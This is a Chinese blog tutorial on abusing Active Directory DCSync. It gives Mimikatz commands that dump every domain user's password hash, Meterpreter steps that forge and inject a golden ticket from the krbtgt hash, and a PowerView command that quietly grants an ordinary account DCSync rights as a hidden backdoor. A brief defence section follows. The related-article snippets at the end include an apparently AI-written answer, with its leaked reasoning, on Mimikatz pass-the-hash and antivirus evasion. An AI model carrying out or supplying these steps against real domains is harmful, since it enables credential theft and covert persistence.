域内 dcsync 权限维持

最新推荐文章于 2024-08-16 12:35:11 发布
最新推荐文章于 2024-08-16 12:35:11 发布
阅读量1.3k 收藏 29
点赞数 17
文章标签: 安全 面试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/hacker_zrq/article/details/139155418
版权

一、原理 

20210825125600.png

DCSync 是域渗透中经常会用到的技术,其被整合在了 Mimikatz 中。在 DCSync 功能出现之前,要想获得域用户的哈希,需要登录域控制器,在域控制器上执行代码才能获得域用户的哈希。

Mimikatz的DCSync 功能:

该功能可以模仿一个域控制器,从真实的域控制器中请求数据,例如用户的哈希。该功能最大的特点就是不用登陆域控制器,即可远程通过域数据同步复制的方式获得域控制器上的的数据。

在默认情况下,只有 Administrators、Domain Controllers 和 Enterprise Domain Admins 组内的用户有权限使用 DCSync,但我们可以对域内普通用户添加 ACL (Access Control List) 实现普通用户也能调用 DCSync 功能。

权限维持思路:

        当获得了域内管理员权限,如果能修改域内普通用户的权限,使其具有DCSync权限的话,那么普通域用户也能导出域内用户的哈希,这样可以做一个隐蔽的权限维持。默认只有域控主机账号和域管理员能Dcsync,域管和邮件服务器的机器账号有写ACL的权限,可以给指定用户添加Dcsync来dump域哈希。

二、实际操作

利用 DCSync 导出域内哈希

当我们获取相应的权限后,可以利用 DCSync 功能导出域内用户的哈希值。其原理就是利用 DRS (Directory Replication Service)协议通过 IDL_DRSGetNCChanges 从域控制器复制用户哈希凭据。获得了域内用户的哈希后可以进一步利用。

通过 Mimikatz导出【还有其他的方法】

在获取权限的域成员主机上执行如下:

# 导出域内指定用户的信息(包括哈希值)
lsadump::dcsync /domain:whoamianony.org /user:administrator 
lsadump::dcsync /domain:whoamianony.org /user:administrator /csv

# 导出域内所有用户的信息(包括哈希值)
lsadump::dcsync /domain:whoamianony.org /all    
lsadump::dcsync /domain:whoamianony.org /all /csv

利用 DCSync 制作黄金票据

在域渗透中,我们可以通过 DCSync 导出域控制器中 krbtgt 账户的哈希,并利用 krbtgt 账户的哈希制作黄金票据。

黄金票据的详情请看:《内网渗透测试:Kerberos协议相关安全问题分析与利用》

测试环境如下:

image-20210824221346483

假设攻击者已经拿下了内网主机 Windows 10,下面演示如何在内网中利用 DCSync 制作黄金票据来访问 DC 上的资源。

拿下 Windows 10 主机之后,我们加载 kiwi 模块:

load kiwi

image-20210824213230936

然后通过kiwi_cmd执行 Mimikatz 命令,使用 Mimikatz 的 DCSync 功能导出域控制器中 krbtgt 账户的哈希:

kiwi_cmd "lsadump::dcsync /domain:whoamianony.org /user:krbtgt"

image-20210824214421165

然后我们便可以通过 krbtgt 账户的哈希生成黄金票据了:

golden_ticket_create -u Administrator -d whoamianony.org -s S-1-5-21-1315137663-3706837544-1429009142 -k 6be58bfcc0a164af2408d1d3bd313c2a -t gold.tck

执行后生成的票据会咱是存放在你的 Kali 上,然后清空目标主机上的票据:

kerberos_ticket_purge

image-20210824215536411

最后使用kerberos_ticket_use注入刚才生成的票据即可:

kerberos_ticket_use gold.tck

image-20210824215648481

如上图所示,票据成功注入。此时,攻击者就可以利用 Windows 7 任意访问域控上的资源了:

dir \\DC\c$

image-20210824220003150

有了黄金票据之后的操作就简单了,懂得都懂!

利用 DCSync 进行域内权限维持

要想利用 DCSync 功能,得要拥有 Administrators、Domain Controllers 或 Enterprise Domain Admins 组内的用户权限,因此就让普通域用户拥有 DCSync 的操作权限,那么普通域用户也能导出域内用户的信息了,这样可以可以做一个隐蔽的后门进行权限维持。

具体做法就是为普通域用户添加三条 ACE 访问权限控制项,赋予任意以下任一用户的权限:

  • Domain Admins组内的用户
  • Enterprise Admins组内的用户

DS-Replication-Get-Changes(GUID:1131f6aa-9c07-11d1-f79f-00c04fc2dcd2)

DS-Replication-Get-Changes-All(GUID:1131f6ad-9c07-11d1-f79f-00c04fc2dcd2)

DS-Replication-Get-Changes(GUID:89e95b76-444d-4c62-991a-0facbeda640c)

我们可以通过 Empire 框架中的 PowerView.ps1 脚本实现:

Import-Module .\powerview.ps1
​
# 为域用户 whoami 添加以上三条 ACE
Add-DomainObjectAcl -TargetIdentity "DC=whoamianony,DC=org" -PrincipalIdentity whoami -Rights DCSync -Verbose

image-20210824235724341

三、DCSync 的防御

DCSync 攻击的原理是模拟域控制器与域控制器之间的数据同步复制。最好的防御方法是给控制器设置白名单,将可信任的资产设置在允许同步的白名单内。

除此之外,我们还应尝试枚举 Active Directory 中所有用户的 ACL 查询出所有特权帐户,检测域内被添加 DCSync 权限的用户。Github 上有一个项目 ACLight便提供了这样的功能,只需执行项目中的 Execute-ACLight2.bat,便会生成以下三个文件:

Privileged Accounts - Layers Analysis.txt

Privileged Accounts Permissions - Final Report.csv

Privileged Accounts Permissions - Irregular Accounts.csv

文件中会显示出所有特权帐户。

内网渗透(六十三)之滥用DCSync
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
05-06 1036
在域中,不同的域控之间,默认每隔15min就会进行一次域数据同步。当一个额外的域控想从其他域控同步数据时,额外域控会像其他域控发起请求,请求同步数据。如果需要同步的数据比较多,则会重复上述过程。DCSync就是利用这个原理,通过目录复制服务(Directory Replication Service,DRS)的GetNCChanges接口像域控发起数据同步请求,以获得指定域控上的活动目录数据。目录复制服务也是一种用于在活动目录中复制和管理数据的RPC协议。该协议由两个RPC接口组成。
内网渗透-域内权限维持
lza20001103的博客
10-01 1185
域内权限维持 文章目录域内权限维持前言PTTTGT(黄金票据)sspSkeleton KeySID History后记 前言 上期我们讲了windows和Linux中的权限维持,这期我们讲一下域内权限维持权限维持是后渗透必不可少的环节,大家一定要好好掌握啊。 PTT PTT(票据) window认证机制 http://note.youdao.com/noteshare?id=cb8c505af1c38b461be8e964e9825dca&sub=F271F9DD1A894C4188D1AE
【域权限维持】-DCsync
qq_41617902的博客
01-20 888
DCsync:模拟域控制器并从域控制器导出帐户密码hash
利用DSCync进行域内权限维持
总有人间一两风,填我十万八千梦
03-02 645
一个域环境可以拥有多台域控制器,每台域控制器各自存储着一份所在域的活动目录的可写副本,对目录的任何修改都可以从源域控制器同步到本域、域树或域林中的其他域控制器上。当一个域控想从另一个域控获取域数据更新时,客户端域控会向服务端域控发送DSGetNCChanges请求,该请求的响应将包含客户端域控必须应用到其他活动目录副本的一组更新。通过情况下,域控制器之间每15分钟就会有一次域数据同步。DCSync技术就是利用域控制器同步的原理,通过DRS服务的某接口向域控发起数据同步请求。
域环境权限维持Dcsync
总有人间一两风,填我十万八千梦
04-19 1657
当获得了域内管理员权限,如果能修改域内普通用户的权限,使其具有DCSync权限的话,那么普通域用户也能导出域内用户的哈希,这样可以做一个隐蔽的权限维持。默认只有域控主机账号和域管理员能Dcsync,域管和邮件服务器的机器账号有写ACL的权限,可以给指定用户添加Dcsync来dump域哈希
赋予域内普通用户dcsync权限来变向权限维持
热门推荐
Shanfenglan's blog
12-25 4万+
文章目录前言利用过程防御方法 前言 DCsync是几个权限的集合体,如果普通用户想具有DCsync权限,可以给对象添加以下三条ACE: DS-Replication-Get-Changes,对应GUID为:1131f6aa-9c07-11d1-f79f-00c04fc2dcd2 DS-Replication-Get-Changes-All,对应GUID为:1131f6ad-9c07-11d1-f79f-00c04fc2dcd2 DS-Replication-Get-Changes-In-Filtered-S
内网渗透(七十二)之域权限维持之伪造域控
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
05-14 840
2022年1月10日,国外安全研究员Kaido发文称发现了一种新的伪造域控方式,安全研究员只需要新建一个机器账户,然后修改机器账户的UserAccountControl属性为8192。活动目录就会认为这个机器账户就是域控,然后就可以使用这个新建的机器账户进行DCSync操作了。由于修改机器账户的UserAccountControl属性需要域内权限,因此这种方式可以用来进行域权限维持。这种权限维持方式与DCShadow类似,都是在域内伪造域控。
内网渗透(七十七)之域权限维持之ACL滥用(中)
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
05-18 703
如图所示是微软对于msDS-AllowedToActOnBehalfOfOtherldentity 属性的描述jack是域中的一个普通用户。
红队内网攻防渗透:内网渗透之内网对抗:权限维持篇&内网AD域&Kerberos点&黄金票据&白银票据&钻石票据&蓝宝石票据
HACKONE的博客
06-25 688
蓝宝石票据与钻石票据类似,票据不是伪造的,而是通过请求后获得的合法票据。在蓝宝石票据中,高权限用户PAC是通过S4U2Self+U2U获得的,然后该PAC会替换原来的PAC,由于该票据是完全合法元素组合起来的,所以是最难检测的票据。白银票据是伪造的 Kerberos Ticket Grant Service (TGS) 票证,银票仅允许攻击者伪造特定服务的票证授予服务 (TGS) 票据。白银票据所需的利用条件和黄金票据是相同的,只是秘钥换成了对应服务的机器账户 Hash(尾部带$的均为机器账户)
域渗透完全技巧.pdf
10-03
5. **权限维持**:一旦获取了域控权限,攻击者会部署后门,如利用域信任关系、SID历史、AdminSDHolder和SDProp、Dcsync后门等。他们还会使用各种技巧,如组策略Hook、PasswordChangeNotify、Kerberoasting后门等,...
域渗透-DCSync
mingyqf的博客
02-26 1577
作者:Zahad003 原文链接:https://www.cnblogs.com/Mikasa-Ackerman/p/yu-shen-touDCSync.html DCSync是域渗透中经常用到的技术(我在大致学习了以后发现确实如此) 利用条件: 获得以下任一用户的权限: Administrators组内的用户 Domain Admins组内的用户 Enterprise Admins组内的用户 域控制器的计算机帐户 Mimikatz实现 导出域内所有用户hash mimikatz.exe privile
内网渗透之滥用DCSync
xnxqwzy的博客
08-23 181
从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。因为入门学习阶段知识点比较杂,所以我讲得比较笼统,大家如果有不懂的地方可以找我咨询,我保证知无不言言无不尽,需要相关资料也可以找我要,我的网盘里一大堆资料都在吃灰呢。干货主要有:①1000+CTF历届题库(主流和经典的应该都有了)②CTF技术文档(最全中文版)③项目源码(四五十个有趣且经典的练手项目及源码)
内网渗透测试:DCSync 攻击技术的利用
dzqxwzoe的博客
08-20 1041
在域环境中,不同域控制器(DC)之间,每 15 分钟都会有一次域数据的同步。当一个域控制器(DC 1)想从其他域控制器(DC 2)获取数据时,DC 1 会向DC 2 发起一个 GetNCChanges 请求,该请求的数据包括需要同步的数据。如果需要同步的数据比较多,则会重复上述过程。DCSync就是利用的这个原理,通过 Directory Replication Service(DRS) 服务的 GetNCChanges接口向域控发起数据同步请求。
权限维持(重置DSRM密码与AdminSDHolder滥用)
qq_18811919的博客
03-25 1063
本篇文章讲解域内常见的权限维持手法的两种重置DSRM密码与AdminSDHolder滥用, 当然利用的姿势还有很多这里只是讲解了几种工具,下面我将写域权限维持ACL滥用的 相关文章欢迎大家的支持。
域控权限维持2
wuxinweii的博客
12-06 483
利用黄金票据维持域内权限 环境: 1.域控主机的管理员账户 2.域内一台主机以及域成员用户 一、导出krbtgt的NTLM hash,用来伪造黄金票据 lsadump::dcsync /domain:[域名] /user:krbtgt 二、获取域SID wmic useraccount get name,sid 三、获取当前用户的SID net group “domain adminis” /domain 四、获取域内某个主机权限后,查看当前用户以及所诉组 net user wxw2 /domain
利用机器账户进行域权限维持
渗透测试研究中心
09-02 815
0x00 前言机器帐户被许多技术用于权限提升和横向移动,但也有通过机器帐户建立域权限持久性的情况。这涉及将任意机器帐户添加到特权组(例如域管理员组)或修改机器帐户的userAccountControl属性中,使其转换为域控制器。在这两种情况下,攻击者都可以通过机器帐户进行身份验证并执行特权操作,例如通过 DCSync 导出所有域哈希等。@Sean Metcalf是第一个公开披露如何通过将机...
什么是DCSync
sangfor_edu的博客
10-28 850
在域环境中,域控制之间每十五分钟就会进行一次域数据同步。当域控制A需要从域控制器B获取数据时,会向其发送一个 GetNCChanges 请求,该请求包含了需要同步的数据,如果获取的数据较多,则会进行循环请求。DCSync是mimikatz在2015年添加的一个功能,利用的这个原理,通过 Directory Replication Service(DRS) 服务的 GetNCChanges 接口模仿一个域控制器向另一个域控制器发起数据同步请求,能够用来导出域内所有用户的hash。
域内权限维持思路总结
道一安全
08-16 1864
在通过某个漏洞或者通过域用户机器抓取hash等手段拿到域控制器权限后,如果不做权限维持,很有可能因为域管理员将域控的密码修改了或者讲漏洞修复了,导致域控制器权限丢失,导致之前的努力都白费了。
mimikatz是干嘛的?
最新发布
05-09
<think>好的,我现在要回答用户关于mimikatz工具的功能和用途的问题。首先,我需要回顾用户提供的引用内容,确保准确引用相关信息。用户给出了五个引用,涵盖了mimikatz的基本使用、密码提取原理、绕过杀毒软件的方法、dcsync功能等。 首先,mimikatz的主要功能是提取Windows系统中的凭证信息,尤其是明文密码和哈希值。根据引用[2],它通过从lsass.exe进程中逆向加密算法来获取密码。这里需要解释清楚lsass的作用以及mimikatz如何利用这一点。 其次,用户提到的功能包括pass-the-hash攻击、黄金票据和白银票据的制作,以及dcsync模拟域控制器同步数据。这些功能在引用[1]、[5]中有所涉及,尤其是dcsync的使用方法需要详细说明。 还要注意mimikatz的使用限制,比如需要管理员权限(引用[1])以及如何绕过杀毒软件,比如使用procdump(引用[4])。此外,AES密钥的使用条件(安装补丁)也需要提及。 用户可能需要了解实际应用场景,比如渗透测试和内网横向移动,这些在引用中虽然没有直接提到,但根据功能可以合理推断。同时,生成的相关问题需要覆盖原理、防御措施、使用条件等,以帮助用户进一步学习。 需要确保回答结构清晰,分点列出功能和用途,引用正确的来源,并在末尾添加相关问题。同时,避免使用Markdown格式,保持自然的中文表达。最后检查是否有遗漏的重要功能,如sekurlsa模块的使用(引用[3])和kiwi模块的关联。</think>### Mimikatz工具的功能与用途分步解析 #### 一、核心功能说明 1. **凭证提取** - 直接从内存中提取$Windows$登录凭证,包括**明文密码**、**NTLM哈希**、**Kerberos票据**等[^2]。通过逆向$lsass.exe$进程的加密算法(如wdigest/tspkg模块),可还原出用户输入的原密码,系统未重启时有效。 - 示例命令:`sekurlsa::logonpasswords`[^3] 2. **Pass-the-Hash攻击** - 使用$NTLM$或$AES256$密钥哈希进行身份验证绕过,无需明文密码即可横向移动。引用[1]中的命令展示了通过AES256密钥模拟用户登录: ```bash mimikatz "privilege::debug" "sekurlsa::pth /user:a /domain:test.local /aes256:f74b379b5b422819db694aaf78f49177ed21c98ddad6b0e246a7e17df6d19d5c" ``` 3. **票据操作** - 生成**黄金票据**(伪造任意域用户TGT)和**白银票据**(伪造服务票据),用于长期权限维持[^5]。 4. **域渗透辅助** - 通过`dcsync`功能模拟域控制器同步数据,直接获取域内所有用户的哈希值: ```bash lsadump::dcsync /domain:test.com /all /csv ``` 需域管理员权限执行。 #### 二、典型应用场景 - **红队渗透测试**:用于内网横向移动、权限提升和凭证收集 - **应急响应分析**:检测系统中是否存在凭证泄露痕迹 - **系统加固验证**:测试补丁(如KB2871997)是否有效阻止哈希提取 #### 三、使用限制与对抗措施 1. **权限要求**:需管理员权限运行[^1] 2. **防御规避**: - 部分杀软会拦截mimikatz进程,可通过微软官方工具$procdump$导出lsass内存再离线分析[^4] - 启用Credential Guard或限制lsass调试权限可防御 3. **系统依赖**:AES密钥功能需系统安装特定补丁[^1]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

ad_m1n

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值